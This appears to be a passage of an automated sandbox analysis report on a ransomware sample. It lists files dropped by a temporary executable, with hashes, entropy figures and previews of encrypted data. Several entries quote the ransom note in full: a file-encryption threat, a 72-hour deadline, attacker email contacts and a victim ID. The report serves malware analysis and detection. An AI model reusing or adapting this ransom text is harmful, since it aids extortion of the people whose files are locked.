                                                                                                                                              SSDEEP:24:phSLVfLTgFaut3id9s9r3axNia1vJPAst3T+RGzCMxEq11n/sBLBvHaeop7+K2p/:phSL2cIrPa3ftqQJEq110BdSeop7+lp/
                                                                                                                                              MD5:FBE6A1C7684FEA42DEEBDB3C3076F88B
                                                                                                                                              SHA1:6BD1E16EA160B454C7D155B13F284A02670D2D29
                                                                                                                                              SHA-256:A8443A58333A7C244D72A9BCDBDF5D7B54E68A01945BA227436B8AF2FE508338
                                                                                                                                              SHA-512:68602262BFE5A82AAACB92EF5A66DF5EE86184DB41EB6F2F68E5970308C539489769688AD27E8C4B43E9C5D220C93A7F350AE59C439318674B4BA4D78D80CCC9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:_..z77..l.w..U...( .yf.o......dP../o.?dp..Lf4....3m)ON....>_..V.....|u....9P...=L...+... J..`M...v...J.'...h.P.p......`.%........{..e.n.k.@.u(....8.9...%.4$%.D.fT....E....A.p...+R...>.q......7.C....|.@..C...-Z...o......B@B........x&u...x...9..r.;.....v~...E...!z.n...a..^....'......;%.#...V.%..;.8..#.98..K@.M..X\....3.X[.+1..A.j..O.V.B^.Jx3h...A.p..T@f3Q(}N..D..A..........P.r)...+o..q.w...w........'.=z.X.v.,7..8d......q./m.28.$....'..@$.G.|....(..%.....i..].F+,.6,Tg..`.V.e.....8...]Q..Z.&M....."...C.!tl...)F.9.h&?5.....|.y .d....4.......<...._f..>\!.=m.....9..O"/0.....O!T.....G7`.6.No>/PaE......".)>1.4dY.)..S...P.,.(.j.m|..K f...,.*.JB.O>.....=...k.v.Y.....b..e........H...../;.T..wF.v.......kP4h9Q...P.....+..u8.........V...|..E91.p.......)............$.J.a1.c!F~)NF..a...C....(m......1.v.....v.=y......C..z...s.s..G.<.EMa.....<.q...G.*...c.....{.......Tp*........d..B..Xw.N|.)..}Q...V.\~...r...%;.../k7.pU1.....);q.....-..L.l..]&.gm.j[<
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):284
                                                                                                                                              Entropy (8bit):7.233627170544393
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:y4+P1vScg8t8gkjFkG7K5bn74WYRk46j0WWt0QWdGRWn:XgZScglbOSKl8W8kNj0WWGQWI4n
                                                                                                                                              MD5:6544046348EC07ADB4E779C67A141406
                                                                                                                                              SHA1:E01C2BDBAD02817AFE8623743E2FFF602129376E
                                                                                                                                              SHA-256:F165BE3C773A2A9C916D3C2168D42ECCC56861E7554B33B76FC45445B514EDCF
                                                                                                                                              SHA-512:ED3877633A0D17418DFDE22B7B48CC7B40D5D55E7AB500BF52C13E8F8AA98885FB3CB5E0BA07FB8F3BABC1A8E62D1DEFE60BC42D86CFC2FB5E2E1898A588074F
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:er.yU{}......~.\}}.S...y..4HoF.:..|.mV...'..4..Z..:j..~ .nB.F@. I...h.?.A4...!.t..}G.B-^F..........Q_#...E\l/4.B9I\.9,..D}...1A7...^MJ..aZ@.....G..N..F...3Q....(.....at... .m....(B..>.O.....:H............&.../..6.4.HT...4.K..s...6Xr.........|.)...5.+.k. .r:...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):284
                                                                                                                                              Entropy (8bit):7.233627170544393
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:y4+P1vScg8t8gkjFkG7K5bn74WYRk46j0WWt0QWdGRWn:XgZScglbOSKl8W8kNj0WWGQWI4n
                                                                                                                                              MD5:6544046348EC07ADB4E779C67A141406
                                                                                                                                              SHA1:E01C2BDBAD02817AFE8623743E2FFF602129376E
                                                                                                                                              SHA-256:F165BE3C773A2A9C916D3C2168D42ECCC56861E7554B33B76FC45445B514EDCF
                                                                                                                                              SHA-512:ED3877633A0D17418DFDE22B7B48CC7B40D5D55E7AB500BF52C13E8F8AA98885FB3CB5E0BA07FB8F3BABC1A8E62D1DEFE60BC42D86CFC2FB5E2E1898A588074F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:er.yU{}......~.\}}.S...y..4HoF.:..|.mV...'..4..Z..:j..~ .nB.F@. I...h.?.A4...!.t..}G.B-^F..........Q_#...E\l/4.B9I\.9,..D}...1A7...^MJ..aZ@.....G..N..F...3Q....(.....at... .m....(B..>.O.....:H............&.../..6.4.HT...4.K..s...6Xr.........|.)...5.+.k. .r:...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4362
                                                                                                                                              Entropy (8bit):7.955956244515322
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:mt84aso1VDHQLtPDHHetOmEhoCiP/KPBGHszyzFsselz3qol:A8/so1V8x7HHpCfPSBZyzFssez
                                                                                                                                              MD5:C64421FC3E6BEE923ED40810D7717DE7
                                                                                                                                              SHA1:BD45BD9D771BD9EA08851AA816E68D2763BE5C17
                                                                                                                                              SHA-256:4C0E7E5EAB58FEE4D9BC95B58339873DD810FC9A1FB085A7E26060E4AA33E922
                                                                                                                                              SHA-512:D30F440D1E5CB970B7B4BD4FE6EEB1B283C01795560CBE7A25131338E1E4004B505A289C4BEE09844DB645FC5E65CF6A15F5821C57822BE58ADE7043D5140B0C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:r.98.q..~;.m[`3.x......U.*.&. ..0..A..k7Y..}.E..2.....N...?.....(.,hZO}.%'.`..".....]J.>.f.SpX.'Q..*v.f.7......./....0a.......u.E..I...?.[;.o0.j...G..L.;..p9......]!.aJ]....avp.W..x..^8...c...R..X%.F.4.!.)%..n.......U.%.t.U.C...,.RM.k...V.u.+.0...#."+u.x..O.....;.......).........N.+.%.....5B.$&pY.-.aM..'.........\..+..JY.M.D.*`w..<'...>...#.p.G.[8Cf...NrM..Ak.m.0.~..{4...;..h..x..............a.y.M.[..%..%.....EW/J.....\...p..........A..c`)p0..B%.wI<...Bl.........d.U.....6X..3$..p....y1...aktV/E.CI...~.V...o;).....(.....~......L..[C.o.N........B.x&...A......q_...X.DJ=d.4...O}]...1.$...3e!"<.".+Hi......b..;.g...3....#.O.?...j;&O.....5.$.x....V.....R..W\1v;QX...+Ai..p`Kru...<..A.!.......x7...^..\..`6...._a....C...P.V5|K.. 0.DF..<\..Kl..........&ws.......7`.X .Eo.d..u..5....X.....e.'..~H..~ca......d.....O....N....". ..]....a.dl.NU...mt....}..;...q.........6....e..@..hE~.:......Q...'.t.....O..b.,...@*.&.....2...d...F...;....Tee.\...h...'-
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4362
                                                                                                                                              Entropy (8bit):7.955956244515322
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:mt84aso1VDHQLtPDHHetOmEhoCiP/KPBGHszyzFsselz3qol:A8/so1V8x7HHpCfPSBZyzFssez
                                                                                                                                              MD5:C64421FC3E6BEE923ED40810D7717DE7
                                                                                                                                              SHA1:BD45BD9D771BD9EA08851AA816E68D2763BE5C17
                                                                                                                                              SHA-256:4C0E7E5EAB58FEE4D9BC95B58339873DD810FC9A1FB085A7E26060E4AA33E922
                                                                                                                                              SHA-512:D30F440D1E5CB970B7B4BD4FE6EEB1B283C01795560CBE7A25131338E1E4004B505A289C4BEE09844DB645FC5E65CF6A15F5821C57822BE58ADE7043D5140B0C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:r.98.q..~;.m[`3.x......U.*.&. ..0..A..k7Y..}.E..2.....N...?.....(.,hZO}.%'.`..".....]J.>.f.SpX.'Q..*v.f.7......./....0a.......u.E..I...?.[;.o0.j...G..L.;..p9......]!.aJ]....avp.W..x..^8...c...R..X%.F.4.!.)%..n.......U.%.t.U.C...,.RM.k...V.u.+.0...#."+u.x..O.....;.......).........N.+.%.....5B.$&pY.-.aM..'.........\..+..JY.M.D.*`w..<'...>...#.p.G.[8Cf...NrM..Ak.m.0.~..{4...;..h..x..............a.y.M.[..%..%.....EW/J.....\...p..........A..c`)p0..B%.wI<...Bl.........d.U.....6X..3$..p....y1...aktV/E.CI...~.V...o;).....(.....~......L..[C.o.N........B.x&...A......q_...X.DJ=d.4...O}]...1.$...3e!"<.".+Hi......b..;.g...3....#.O.?...j;&O.....5.$.x....V.....R..W\1v;QX...+Ai..p`Kru...<..A.!.......x7...^..\..`6...._a....C...P.V5|K.. 0.DF..<\..Kl..........&ws.......7`.X .Eo.d..u..5....X.....e.'..~H..~ca......d.....O....N....". ..]....a.dl.NU...mt....}..;...q.........6....e..@..hE~.:......Q...'.t.....O..b.,...@*.&.....2...d...F...;....Tee.\...h...'-
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):131338
                                                                                                                                              Entropy (8bit):0.5085668773807075
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:HfW8NJ+jnt1mrcN1IPZ4eOr2DfNWXdzjxuPyIxKAKIx5HV8snKtm:Hfh/u1wcHIiprsFcxJCKot
                                                                                                                                              MD5:AB2B80ED365B329E673344C23E52416A
                                                                                                                                              SHA1:249DF3A1EAFAD69552AF253F4D9B9BF9FC2BB4A3
                                                                                                                                              SHA-256:3DA0862C2E8C103A1C278F7C16FF1F3E2F9AE0FF2C81AFAA0936CDF781CC3C14
                                                                                                                                              SHA-512:ABD1C2B8652E471E1A444C579F5D64EFDD190D247AF6882C2C1E97592025586C04343C96C4FEAAD6030666F5346190129876A698BE3D47B1DA8E00801003C87A
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.....;..UFK..A.......6.o.=..z..`.P.2.....x.......9.}@'..2.a.g.'..0m<Ae....Ul.........Sd.u.w].|...z.$...x.?k}........._.O..A...No.j..M.F..%...c..3V....Y@..R..mSX/. .TZ.b......+k..b^F..9z.@.vn.}...".e@U.W.>..m.....P...z.U\..3.m..5}.L...G....9..{.w....hW;w+o.\@"P...Vw>~S..`....../&.h.]N.^r.Rp|^.....iY.4jW....W....P....DZ+.C..`."..m......#.-.MBG...v_t+.....[am..(.n....K.'rY..r.u...o..[3.......uq........4...@..CKG .T..w......E......~...o.85...........7i....4...l.....n...g.zbhO.<|$...C{. RNOD.Se.QE.G4r."..................5.a9kV....e.oF..G.,....l.....c.WuP./8K|];.{...gCz.......@B.r..b..v.hh,...5........{......S.P...*......g9..j..g.....4...ON./.pm..E4.YO..../...u.fB..Yc..P.~?..o........>*....o..um..........F.o.T-.#".Mg.L.CA.`-JX.,...f.Y.O.._..=Y..j.>;2.yh.';?.a.-..........m...r.5..gV.|.J..?A.R...).d.|T?."...4.0.....[.~..S.....L....@.#r..M.^..Y.*.....?.-w.~..........1O.....i....+..........".....@%nCY{.4V..1.X..a...QA]O~P,.W......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):131338
                                                                                                                                              Entropy (8bit):0.5085668773807075
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:HfW8NJ+jnt1mrcN1IPZ4eOr2DfNWXdzjxuPyIxKAKIx5HV8snKtm:Hfh/u1wcHIiprsFcxJCKot
                                                                                                                                              MD5:AB2B80ED365B329E673344C23E52416A
                                                                                                                                              SHA1:249DF3A1EAFAD69552AF253F4D9B9BF9FC2BB4A3
                                                                                                                                              SHA-256:3DA0862C2E8C103A1C278F7C16FF1F3E2F9AE0FF2C81AFAA0936CDF781CC3C14
                                                                                                                                              SHA-512:ABD1C2B8652E471E1A444C579F5D64EFDD190D247AF6882C2C1E97592025586C04343C96C4FEAAD6030666F5346190129876A698BE3D47B1DA8E00801003C87A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....;..UFK..A.......6.o.=..z..`.P.2.....x.......9.}@'..2.a.g.'..0m<Ae....Ul.........Sd.u.w].|...z.$...x.?k}........._.O..A...No.j..M.F..%...c..3V....Y@..R..mSX/. .TZ.b......+k..b^F..9z.@.vn.}...".e@U.W.>..m.....P...z.U\..3.m..5}.L...G....9..{.w....hW;w+o.\@"P...Vw>~S..`....../&.h.]N.^r.Rp|^.....iY.4jW....W....P....DZ+.C..`."..m......#.-.MBG...v_t+.....[am..(.n....K.'rY..r.u...o..[3.......uq........4...@..CKG .T..w......E......~...o.85...........7i....4...l.....n...g.zbhO.<|$...C{. RNOD.Se.QE.G4r."..................5.a9kV....e.oF..G.,....l.....c.WuP./8K|];.{...gCz.......@B.r..b..v.hh,...5........{......S.P...*......g9..j..g.....4...ON./.pm..E4.YO..../...u.fB..Yc..P.~?..o........>*....o..um..........F.o.T-.#".Mg.L.CA.`-JX.,...f.Y.O.._..=Y..j.>;2.yh.';?.a.-..........m...r.5..gV.|.J..?A.R...).d.|T?."...4.0.....[.~..S.....L....@.#r..M.^..Y.*.....?.-w.~..........1O.....i....+..........".....@%nCY{.4V..1.X..a...QA]O~P,.W......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):302
                                                                                                                                              Entropy (8bit):7.203567229239552
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:L+ITh1bCRmdjQWqguqWA3ia4xe+cjS4H+modH/EfWwfmn:L+gh1cmdjDRftjSoPodSWwfmn
                                                                                                                                              MD5:264E6B4BC6988CD59FA155142251DD1B
                                                                                                                                              SHA1:B3291F3899D89EA2C59D9182086E182D351C5C6F
                                                                                                                                              SHA-256:40D66D2206EB929EDFB95C868BB3E01961CBB2B92DAAEADCBC6B7CB0BD97CDEA
                                                                                                                                              SHA-512:8FBBA838794339F1CF1F8505E04E60EB79C01E267DA0B7114E7510F9719570ED7F66701F63FBAD70827372AF45DA6B7058CACD4AED77B2276611B1F45880A850
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:...@W.`.{r[J.l.H...........<..home.Q...v......l..x(T......p2.)X..4..^..k...(C.K..{.N........pF....ku`e,.. .I .Qn.w5..*.[~w3..%.V.ka..wL...x(.......h....e?...N66...f)...u:K....9.w.K.uvp@b...\..N*.V....+(..]M..r".'{..Hn...q[..l.....>.w. ..........B^@>4(.do...5.R...(FQ9.S_O~.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):302
                                                                                                                                              Entropy (8bit):7.203567229239552
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:L+ITh1bCRmdjQWqguqWA3ia4xe+cjS4H+modH/EfWwfmn:L+gh1cmdjDRftjSoPodSWwfmn
                                                                                                                                              MD5:264E6B4BC6988CD59FA155142251DD1B
                                                                                                                                              SHA1:B3291F3899D89EA2C59D9182086E182D351C5C6F
                                                                                                                                              SHA-256:40D66D2206EB929EDFB95C868BB3E01961CBB2B92DAAEADCBC6B7CB0BD97CDEA
                                                                                                                                              SHA-512:8FBBA838794339F1CF1F8505E04E60EB79C01E267DA0B7114E7510F9719570ED7F66701F63FBAD70827372AF45DA6B7058CACD4AED77B2276611B1F45880A850
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...@W.`.{r[J.l.H...........<..home.Q...v......l..x(T......p2.)X..4..^..k...(C.K..{.N........pF....ku`e,.. .I .Qn.w5..*.[~w3..%.V.ka..wL...x(.......h....e?...N66...f)...u:K....9.w.K.uvp@b...\..N*.V....+(..]M..r".'{..Hn...q[..l.....>.w. ..........B^@>4(.do...5.R...(FQ9.S_O~.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1549496620404751
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:oKeWuVW6oV3Yr/whToUjEn7/Mrn4GueDcbDCpGnpAb:oSuEFgwhTo4E7UFDcbDvpw
                                                                                                                                              MD5:D71A1A3B6F04C6AE677E7F0F51DA94E4
                                                                                                                                              SHA1:F890F8989465568B0DC1DFED914BFC5FC9E0B57F
                                                                                                                                              SHA-256:4900A76511014404764BE011FA543D245B93C49BE74E12E3E1F2B88622160594
                                                                                                                                              SHA-512:ACD9F103338B4C7B54BEF836BC17FA0B4BA8516219AE2C9F603193FB85437C068850FEB04D4F29293114E771D4BE6ACCF97ED9D60A9BCBB4C28F0E53316BA543
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.b;.....q....... .6..Dp/.........7..?{..1.m...H.r.Id<160._..d".(6w..S.6!.+..g..ly:....`.3.Gb.....u0+Y.L...|.:s...tC3.M.Q...B....2+.i.e(.n..^Ka....=..V.|.......].a.z...7.}.iy..Ok.9..l....h/>F..=.6...y...z5.v."...}...............h.....~........$37Pf.....W.D..!...N.;......z5h.%..*..y(....].{]\.[.o.......V(..v%|.U.%5..#'..;...A....X...x.&....X..[.8YJ.l.o7.O......B..H.ph.h.:.9z.B.>.q..Ao.P.[..x.A0 .]..,...E.l.QrT..K...8.. .G..<x..l.........a..(...!..hk4v..c\.I..~`...E./...^...A,..R{.V.....1...|..{.O.-..^&GcL....wr.....6.D.1....U(....T.{......'...z...;..$.m./.....!.e.4..9..^....`>.P...$......".g.1.~).L....s......os.B.....x....v...#].H.F...!4...H..._.....|XI...w.N..rX...4.....N.rl..3{..z...A.7`....K.&|......?..w4..+....5.U2...5u....&%....E.........9....\...P.-.Q..j..=....'@.!.r...v..C..._e.!.!...-..6Z...G..F`a.K....|_A>....].g.C#......^Y..4.[./.j......yVC.U...P/.i.....x(O..w.g..7.=.....=<n..8A?./...kx.L^..R9B.4...}Z..[-}j...V.Dn...9.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.606607896215746
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:G3QfGYJ94BZhWEIhwDRUawCAxRWgRkEC1NbCcrj9xPVAfH8WnF1dS:G3xYJuZYEIhAN4IgVC1lTrj9RWnF1w
                                                                                                                                              MD5:E4AEAA2659D237F7C695BB9ECA8BAD51
                                                                                                                                              SHA1:14940913A4C3ABBAB948AC18811D311B3F9B0A0F
                                                                                                                                              SHA-256:01C6E1EB8BA0E16F1FB3185E95F766003BA284339CA9DB2B301A8E868E5BD4D9
                                                                                                                                              SHA-512:129D1F95FF46A60F4703F9284624C2DD6CFA70F56E2E582CE0C7C5F183695042917C80DA0FE4ED9A97A2E171E064B6682EA45DC97512BF25832DBC75E44CB8AB
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.R.f.'|Q.C....#^=R.....S.m.....4.C.m.e.06...ck..f..........hr......u.S...,A..J..1..............KC.J..#.s...oP......#Pq..-.u.m.E....9....s|R.X.H.5s..,.U........!...G.Y..;.*.pQ........0....<K.'...&{..x~........&..Vj.L.;.{...........|~A..A.U.e.....}.<...N|..K..9....U....67..z.,.#.jv...}........../.;_j..~..D.....FF.....Y<&KL..B...$...T._#.].../.cC.F.x.d.....SPVA......&H...:...s.A..p.9#8.*..jP.%).L.&#&b.SDQ7....<L0G.vG..bzL..[..t.......VP.c.6...5...xd....I.\(...,1.`.Tm.....?3._a..".:\.j.E..A..Q=h...:m..r.q.<.......ZK...3...4..m4.g.....z..1e~$...-.Hao...<....'}.p.V..b2...)...z......;BT..]....=.l..c......3.E....].(3.x..Q.hdr....l.Z...i.m.L.v>..A...bbU. \tj.a..m.r..u..#.Q.....O.....Q....../..KC.2.5 ....g....7..W.I..V(..8_....H..6........7.<oD....\W.. 0.F..."*...:..l...p...k...4.*D.e.~.T[.~M(+.E....d.u.......V....`.B[....O-.mh6V.{.m.,.S.:.....n..Q.f.+..F....I.}.z.......C.-..6.z.....H..C.-.G.y2)<.t...59..c..o.....a.2(..w.yb&..k+.{.G.p. -
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.606607896215746
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:G3QfGYJ94BZhWEIhwDRUawCAxRWgRkEC1NbCcrj9xPVAfH8WnF1dS:G3xYJuZYEIhAN4IgVC1lTrj9RWnF1w
                                                                                                                                              MD5:E4AEAA2659D237F7C695BB9ECA8BAD51
                                                                                                                                              SHA1:14940913A4C3ABBAB948AC18811D311B3F9B0A0F
                                                                                                                                              SHA-256:01C6E1EB8BA0E16F1FB3185E95F766003BA284339CA9DB2B301A8E868E5BD4D9
                                                                                                                                              SHA-512:129D1F95FF46A60F4703F9284624C2DD6CFA70F56E2E582CE0C7C5F183695042917C80DA0FE4ED9A97A2E171E064B6682EA45DC97512BF25832DBC75E44CB8AB
                                                                                                                                              Malicious:false
